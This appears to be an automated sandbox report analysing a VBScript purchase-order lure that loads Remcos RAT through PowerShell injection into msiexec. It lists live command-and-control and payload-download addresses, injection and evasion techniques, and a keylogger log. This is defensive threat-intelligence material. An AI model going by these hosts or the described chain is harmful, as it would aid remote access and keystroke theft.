                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected Remcos RAT
                Source: Yara matchFile source: 00000009.00000002.3333353972.000000002316F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3317523548.000000000075D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3317708385.0000000000789000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 6764, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                Remote Access Functionality

                barindex
                Detected Remcos RAT
                Source: C:\Windows\SysWOW64\msiexec.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-T15VJDJump to behavior
                Yara detected Remcos RAT
                Source: Yara matchFile source: 00000009.00000002.3333353972.000000002316F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3317523548.000000000075D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3317708385.0000000000789000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 6764, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information221
                Scripting                		Valid Accounts11
                Windows Management Instrumentation                		221
                Scripting                		312
                Process Injection                		1
                Masquerading                		11
                Input Capture                		111
                Security Software Discovery                		Remote Services11
                Input Capture                		11
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		1
                DLL Side-Loading                		131
                Virtualization/Sandbox Evasion                		LSASS Memory2
                Process Discovery                		Remote Desktop Protocol1
                Archive Collected Data                		1
                Non-Standard Port                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts1
                Exploitation for Client Execution                		Logon Script (Windows)Logon Script (Windows)312
                Process Injection                		Security Account Manager131
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive1
                Remote Access Software                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal Accounts2
                PowerShell                		Login HookLogin Hook2
                Obfuscated Files or Information                		NTDS1
                Application Window Discovery                		Distributed Component Object ModelInput Capture1
                Ingress Tool Transfer                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Software Packing                		LSA Secrets1
                File and Directory Discovery                		SSHKeylogging2
                Non-Application Layer Protocol                		Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading                		Cached Domain Credentials113
                System Information Discovery                		VNCGUI Input Capture213
                Application Layer Protocol                		Data Transfer Size LimitsService Stop

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1545815 Sample: nOrden_de_Compra___0001245.vbs Startdate: 31/10/2024 Architecture: WINDOWS Score: 100 30 fumecexpsales1international.duckdns.org 2->30 32 torresvmackenna.cl 2->32 34 bg.microsoft.map.fastly.net 2->34 40 Suricata IDS alerts for network traffic 2->40 42 Found malware configuration 2->42 44 Malicious sample detected (through community Yara rule) 2->44 48 9 other signatures 2->48 8 powershell.exe 18 2->8         started        11 wscript.exe 1 2->11         started        signatures3 46 Uses dynamic DNS services 30->46 process4 signatures5 50 Early bird code injection technique detected 8->50 52 Writes to foreign memory regions 8->52 54 Found suspicious powershell code related to unpacking or dynamic code loading 8->54 56 Queues an APC in another process (thread injection) 8->56 13 msiexec.exe 3 8 8->13         started        18 conhost.exe 8->18         started        58 VBScript performs obfuscated calls to suspicious functions 11->58 60 Suspicious powershell command line found 11->60 62 Wscript starts Powershell (via cmd or directly) 11->62 64 Suspicious execution chain found 11->64 20 powershell.exe 14 18 11->20         started        22 WMIC.exe 1 11->22         started        process6 dnsIp7 36 fumecexpsales1international.duckdns.org 185.236.203.101, 49428, 49474, 49522 M247GB Romania 13->36 28 C:\ProgramData\remcos\logs.dat, data 13->28 dropped 66 Detected Remcos RAT 13->66 68 Installs a global keyboard hook 13->68 38 torresvmackenna.cl 200.6.118.162, 443, 49401, 49705 IngenieriaeInformaticaAsociadaLtdaIIALtdaCL Chile 20->38 70 Found suspicious powershell code related to unpacking or dynamic code loading 20->70 24 conhost.exe 20->24         started        72 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 22->72 26 conhost.exe 22->26         started        file8 signatures9 process10

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                nOrden_de_Compra___0001245.vbs0%ReversingLabs
                nOrden_de_Compra___0001245.vbs5%VirustotalBrowse

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                SourceDetectionScannerLabelLink
                bg.microsoft.map.fastly.net0%VirustotalBrowse
                torresvmackenna.cl0%VirustotalBrowse

                URLs

                SourceDetectionScannerLabelLink
                http://nuget.org/NuGet.exe0%URL Reputationsafe
                http://nuget.org/NuGet.exe0%URL Reputationsafe
                http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                https://aka.ms/pscore6lB0%URL Reputationsafe
                https://go.micro0%URL Reputationsafe
                https://contoso.com/0%URL Reputationsafe
                https://nuget.org/nuget.exe0%URL Reputationsafe
                https://contoso.com/License0%URL Reputationsafe
                https://contoso.com/Icon0%URL Reputationsafe
                https://aka.ms/pscore680%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                bg.microsoft.map.fastly.net
                		199.232.210.172
                		truefalseunknown
                fumecexpsales1international.duckdns.org
                		185.236.203.101
                		truetrue
                  		unknown
                  torresvmackenna.cl
                  		200.6.118.162
                  		truefalseunknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  https://torresvmackenna.cl/bin/iNJULFUvfUQqzNBELgyUIZY67.binfalse
                    		unknown
                    https://torresvmackenna.cl/bin/Interplea.snpfalse
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://nuget.org/NuGet.exepowershell.exe, 00000004.00000002.2208076716.000001A2DAD9F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2405265854.0000000005C17000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      https://torresvmackenna.clpowershell.exe, 00000004.00000002.2178361107.000001A2CB16B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2178361107.000001A2CC235000.00000004.00000800.00020000.00000000.sdmpfalse
                        		unknown
                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000006.00000002.2389944244.0000000004D06000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://aka.ms/pscore6lBpowershell.exe, 00000006.00000002.2389944244.0000000004BB1000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://torresvmackenna.clpowershell.exe, 00000004.00000002.2178361107.000001A2CC96C000.00000004.00000800.00020000.00000000.sdmpfalse
                          		unknown
                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000006.00000002.2389944244.0000000004D06000.00000004.00000800.00020000.00000000.sdmpfalse
                            		unknown
                            https://torresvmackenna.cl/bin/iNJULFUvfUQqzNBELgyUIZY67.binbmsiexec.exe, 00000009.00000002.3317523548.000000000075D000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              https://go.micropowershell.exe, 00000004.00000002.2178361107.000001A2CB8C6000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://contoso.com/powershell.exe, 00000006.00000002.2405265854.0000000005C17000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.2208076716.000001A2DAD9F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2405265854.0000000005C17000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://contoso.com/Licensepowershell.exe, 00000006.00000002.2405265854.0000000005C17000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://contoso.com/Iconpowershell.exe, 00000006.00000002.2405265854.0000000005C17000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://aka.ms/pscore68powershell.exe, 00000004.00000002.2178361107.000001A2CAD31000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000004.00000002.2178361107.000001A2CAD31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2389944244.0000000004BB1000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://torresvmackenna.cl/bin/iNJULFUvfUQqzNBELgyUIZY67.bin1msiexec.exe, 00000009.00000002.3317523548.000000000075D000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                https://github.com/Pester/Pesterpowershell.exe, 00000006.00000002.2389944244.0000000004D06000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		unknown
                                  https://torresvmackenna.cl/bin/Interplea.snpPpowershell.exe, 00000004.00000002.2178361107.000001A2CAF55000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://torresvmackenna.cl/bin/Interplea.snpXR#lpowershell.exe, 00000006.00000002.2389944244.0000000004D06000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		unknown

                                      World Map of Contacted IPs

                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs

                                      Public IPs

                                      IPDomainCountryFlagASNASN NameMalicious
                                      185.236.203.101
                                      		fumecexpsales1international.duckdns.orgRomania
                                      		9009M247GBtrue
                                      200.6.118.162
                                      		torresvmackenna.clChile
                                      		27659IngenieriaeInformaticaAsociadaLtdaIIALtdaCLfalse

                                      General Information

                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1545815
                                      Start date and time:2024-10-31 04:01:04 +01:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 6m 43s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:12
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:nOrden_de_Compra___0001245.vbs
                                      Detection:MAL
                                      Classification:mal100.troj.spyw.expl.evad.winVBS@11/10@4/2
                                      EGA Information:Failed
                                      HCA Information:
                                      • Successful, ratio: 83%
                                      • Number of executed functions: 56
                                      • Number of non-executed functions: 19
                                      Cookbook Comments:
                                      • Found application associated with file extension: .vbs

                                      Warnings

                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                      • Excluded IPs from analysis (whitelisted): 199.232.210.172, 93.184.221.240
                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com
                                      • Execution Graph export aborted for target powershell.exe, PID 576 because it is empty
                                      • Execution Graph export aborted for target powershell.exe, PID 7108 because it is empty
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                      Simulations

                                      Behavior and APIs

                                      TimeTypeDescription
                                      23:01:55API Interceptor1x Sleep call for process: wscript.exe modified
                                      23:01:57API Interceptor1x Sleep call for process: WMIC.exe modified
                                      23:01:59API Interceptor87x Sleep call for process: powershell.exe modified
                                      23:03:16API Interceptor544301x Sleep call for process: msiexec.exe modified

                                      Joe Sandbox View / Context

                                      IPs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      185.236.203.101IMGRO Facturi nepl#U0103tite 56773567583658567835244234Bandido.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                        rIMG465244247443GULFORDEROpmagasinering.cmdGet hashmaliciousRemcos, GuLoaderBrowse
                                          rIMGTR657365756.batGet hashmaliciousRemcos, GuLoaderBrowse
                                            17282393454a20ebb72846132bb7146ed4a1a58abc0a2fcca78c88bb5a73356856494e7ece637.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                              na.rtfGet hashmaliciousRemcosBrowse
                                                DSpWOKW7zn.rtfGet hashmaliciousRemcosBrowse
                                                  Formularz instrukcji p#U0142atno#U015bci Millennium.xlsGet hashmaliciousRemcosBrowse
                                                    SecuriteInfo.com.Exploit.CVE-2017-11882.123.31506.1346.rtfGet hashmaliciousRemcosBrowse
                                                      200.6.118.162https://capot.cl/xyttttopp///youngliving/6nowawyfqu4serw/eGx1b0B5b3VuZ2xpdmluZy5jb20=Get hashmaliciousUnknownBrowse
                                                        https://pub-9a6f1f3f7bf34c09ac13555d175cb570.r2.dev/comnkam.htmlGet hashmaliciousHTMLPhisherBrowse
                                                          https://pub-2598caa00dcf4c658bf8753f6761f962.r2.dev/compki.htmlGet hashmaliciousHTMLPhisherBrowse
                                                            https://pub-2598caa00dcf4c658bf8753f6761f962.r2.dev/compki.htmlGet hashmaliciousHTMLPhisherBrowse
                                                              https://pub-0b366962715b4b8ca9b67a32dc218dbf.r2.dev/bendel.htmlGet hashmaliciousHTMLPhisherBrowse

                                                                Domains

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                bg.microsoft.map.fastly.nethttp://hprus.conegutsud.com.pe/4zgrHK17910PyfC1508dysnmxbczx27005OLWUIBMTRFCEVBH25578NWDJ17331m12#2mzdvgfkgua042eh8kky7aanhr5dggelvb8fjk5yz6jna8o8e5Get hashmaliciousPhisherBrowse
                                                                • 199.232.214.172
                                                                0438.pdf.exeGet hashmaliciousUnknownBrowse
                                                                • 199.232.210.172
                                                                Paiement.emlGet hashmaliciousHTMLPhisherBrowse
                                                                • 199.232.214.172
                                                                https://pub-6838e3dd185d4df89d3bb3eabe6469a4.r2.dev/index.html#Get hashmaliciousUnknownBrowse
                                                                • 199.232.214.172
                                                                https:/click.mailchimp.com/track/click/30010842/docsend.com?p=eyJzIjoiT2RaN0hwNHlyY2E3VXl5TWcwMlA2eFpHVlN3IiwidiI6MSwicCI6IntcInVcIjozMDAxMDg0MixcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL2RvY3NlbmQuY29tXFxcL3ZpZXdcXFwvZzZnYzZjazdtNHlkYTRpa1wiLFwiaWRcIjpcImNhZDg3NzI1Y2UzMjRiMzI4Yzk1ZGVkYWUyMzc4ZTZjXCIsXCJ1cmxfaWRzXCI6W1wiYzE5ZWU5NGJiMzA5YmZhOGQ2MDU3OGI1Mjk5NTFmOWE4NDQ0ODNhYVwiXX0ifQ#steven.davis@tu.eduGet hashmaliciousHTMLPhisherBrowse
                                                                • 199.232.210.172
                                                                https://jksvb.jnkpavers.com/?tZbf66=Tyw6/shhfkanxgsdff/&c=E,1,NSDuZCxGQc6fw5XDGugSpFh6vhsurKgNKuRtQYEvQblaeko7ktmOqkToectUm_5S_qV7IGwrOynGYnQ5TFSCJymAV2tc5TeuFegn96UyDZPOEKOyHYw,&typo=1Get hashmaliciousUnknownBrowse
                                                                • 199.232.214.172
                                                                https://share.hsforms.com/11zbkP7dfTBO0LgTS5dCN0Asixz3Get hashmaliciousMamba2FABrowse
                                                                • 199.232.214.172
                                                                https://app.pandadoc.com/document/v2?token=abf6587d58630a40e08d0ad15de8202e2e9c4af5Get hashmaliciousUnknownBrowse
                                                                • 199.232.210.172
                                                                (No subject) (100).emlGet hashmaliciousTycoon2FABrowse
                                                                • 199.232.210.172
                                                                819614 - Midways Freight Ltd.xlsmGet hashmaliciousUnknownBrowse
                                                                • 199.232.210.172

                                                                ASNs

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                M247GBwZU2edEGL3.elfGet hashmaliciousUnknownBrowse
                                                                • 38.203.241.135
                                                                8v2IShmMos.elfGet hashmaliciousUnknownBrowse
                                                                • 154.17.76.69
                                                                la.bot.sparc.elfGet hashmaliciousUnknownBrowse
                                                                • 38.202.225.97
                                                                Bjl3geiFEK.exeGet hashmaliciousPhorpiexBrowse
                                                                • 91.202.233.141
                                                                la.bot.arm5.elfGet hashmaliciousUnknownBrowse
                                                                • 38.95.109.107
                                                                la.bot.arm.elfGet hashmaliciousUnknownBrowse
                                                                • 38.207.55.140
                                                                nklppc.elfGet hashmaliciousUnknownBrowse
                                                                • 213.109.189.112
                                                                nabarm5.elfGet hashmaliciousUnknownBrowse
                                                                • 178.171.80.195
                                                                nklarm7.elfGet hashmaliciousUnknownBrowse
                                                                • 154.17.76.90
                                                                arm7.elfGet hashmaliciousUnknownBrowse
                                                                • 38.207.37.111
                                                                IngenieriaeInformaticaAsociadaLtdaIIALtdaCLhttps://capot.cl/xyttttopp///youngliving/6nowawyfqu4serw/eGx1b0B5b3VuZ2xpdmluZy5jb20=Get hashmaliciousUnknownBrowse
                                                                • 200.6.118.162
                                                                https://pub-9a6f1f3f7bf34c09ac13555d175cb570.r2.dev/comnkam.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                • 200.6.118.162
                                                                https://pub-2598caa00dcf4c658bf8753f6761f962.r2.dev/compki.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                • 200.6.118.162
                                                                https://pub-2598caa00dcf4c658bf8753f6761f962.r2.dev/compki.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                • 200.6.118.162
                                                                https://pub-0b366962715b4b8ca9b67a32dc218dbf.r2.dev/bendel.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                • 200.6.118.162

                                                                JA3 Fingerprints

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                3b5074b1b5d032e5620f69f9f700ff0efile.exeGet hashmaliciousStealcBrowse
                                                                • 200.6.118.162
                                                                file.exeGet hashmaliciousUnknownBrowse
                                                                • 200.6.118.162
                                                                file.exeGet hashmaliciousUnknownBrowse
                                                                • 200.6.118.162
                                                                Paiement.emlGet hashmaliciousHTMLPhisherBrowse
                                                                • 200.6.118.162
                                                                PO 4500580954.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                • 200.6.118.162
                                                                CPYEzG7VGh.exeGet hashmaliciousDCRatBrowse
                                                                • 200.6.118.162
                                                                https://jpm-ghana-2024-election-conversation-with-oct-24.open-exchange.net/join-the-call?ml_access_token=eyJjb250ZW50Ijp7ImV4cGlyYXRpb25EYXRlIjoiMjAyNC0xMC0zMVQxNToyMDo1OS4wMDZaIiwiZW1haWwiOiJyZGVpdHpAdnItY2FwaXRhbC5jb20iLCJldmVudElkIjo0MjY3Mn0sInNpZ25hdHVyZSI6Ik1FVUNJQzhaMDJJblVZd0syUk9WRkdjL1pMNHRBbWo4RmwxdW9mQjhwZzRmSjZsMkFpRUE5d25HUFFoa3ZrdkM2MlJkQ3lkM09YbnFJZ0xlQTAwMDIxNlRWbG9Hb0ZjPSJ9Get hashmaliciousUnknownBrowse
                                                                • 200.6.118.162
                                                                SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 200.6.118.162
                                                                http://ffcu.onlineGet hashmaliciousUnknownBrowse
                                                                • 200.6.118.162
                                                                file.exeGet hashmaliciousStealc, VidarBrowse
                                                                • 200.6.118.162
                                                                37f463bf4616ecd445d4a1937da06e19Ky4J8k89A7.exeGet hashmaliciousStealc, Vidar, XmrigBrowse
                                                                • 200.6.118.162
                                                                b4s45TboUL.exeGet hashmaliciousStealc, VidarBrowse
                                                                • 200.6.118.162
                                                                rCommercialoffer_Technicaloffer_pdf.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                • 200.6.118.162
                                                                Justificante de pago.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                • 200.6.118.162
                                                                rPO-000172483.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                • 200.6.118.162
                                                                rPO-000172483.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                • 200.6.118.162
                                                                Ppto.24265.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                • 200.6.118.162
                                                                Factura Honorarios 2024-10.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                • 200.6.118.162
                                                                Stadigheder43.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                • 200.6.118.162
                                                                Forreste.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                • 200.6.118.162

                                                                Dropped Files

                                                                No context

                                                                Created / dropped Files

                                                                C:\ProgramData\remcos\logs.dat

                                                                Download File
                                                                Process:C:\Windows\SysWOW64\msiexec.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):144
                                                                Entropy (8bit):3.3378527165164744
                                                                Encrypted:false
                                                                SSDEEP:3:rhlKlM+Wl3l8VlNRlI5JWRal2Jl+7R0DAlBG45klovDl6v:6lw/5YcIeeDAlOWAv
                                                                MD5:1996C3A93DF3BC0A9D18679B930FE8FE
                                                                SHA1:57224E6025519371731171F264380FE504B8A49D
                                                                SHA-256:1FAE00BEDCD248C9A88B9A04095CC2614544B8D4E04FD129677A431CE79BB4E0
                                                                SHA-512:6112E57BA9760CC7240371D73AB954E398C61A342277B0B643C80E0D7978F0BF0FF07549C82937FBEDF433732C83160E61093026FA224EA5BF31EC19C98B4C29
                                                                Malicious:true
                                                                Yara Hits:
                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                                                Reputation:low
                                                                Preview:....[.2.0.2.4./.1.0./.3.0. .2.3.:.0.2.:.4.4. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

                                                                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                                                Download File
                                                                Process:C:\Windows\System32\wscript.exe
                                                                File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                Category:dropped
                                                                Size (bytes):71954
                                                                Entropy (8bit):7.996617769952133
                                                                Encrypted:true
                                                                SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                Malicious:false
                                                                Reputation:high, very likely benign file
                                                                Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

                                                                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                                Download File
                                                                Process:C:\Windows\System32\wscript.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):328
                                                                Entropy (8bit):3.2539954282295116
                                                                Encrypted:false
                                                                SSDEEP:6:kKBAE9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:5SDImsLNkPlE99SNxAhUe/3
                                                                MD5:D08FD6A9F7CB5F7AFD1E034AD5BB4267
                                                                SHA1:7ECB052953A0C6548E1D66048F40FFEFC946505C
